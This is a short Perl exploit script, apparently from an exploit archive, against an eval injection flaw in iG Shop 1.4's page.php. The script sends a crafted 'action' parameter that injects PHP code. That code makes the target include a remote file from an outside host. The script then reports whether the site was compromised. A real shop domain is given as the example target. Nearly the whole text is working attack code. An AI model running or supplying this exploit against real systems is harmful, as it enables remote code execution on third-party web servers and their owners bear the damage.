igshop14-eval.txt

Posted on 20 June 2007

#!/usr/bin/perl -w
use LWP::UserAgent;
####################################################################
#iG Shop 1.4 eval Inclusion Vulnerability
#found by IFX #nyubicrew
#Vulnerability on page.php
#if (!$action)
#	$action = "make";
#// here the function will be called.
#eval ("page_$action();");
####################################################################
die "Example: perl $0 http://www.planetgolfuk.co.uk/shop
" unless @ARGV;

$b = LWP::UserAgent->new() or die "Could not initialize browser
";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$url = $ARGV[0] . "/page.php?action=|include($_GET[cok]);//phpinfo&cok=http://h1.ripside.net/ifx/a.txt?";

$res = $b->request(HTTP::Request->new(GET=>$url));
$respone = $res->content;

if ($respone =~ /nyelipin file ;P/i){
print "
Tembus...
";
print "
$url
";
}
else{
print "
Gagal cok...
";
}

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Nethserver 7 / 8 Cross Site Scripting
Joomla 4.2.8 Information Disclosure
CHAOS 5.0.8 Cross Site Scripting / Remote Command Execution
Rocket LMS 1.9 Cross Site Scripting
PopojiCMS 2.0.1 Remote Command Execution

Last 20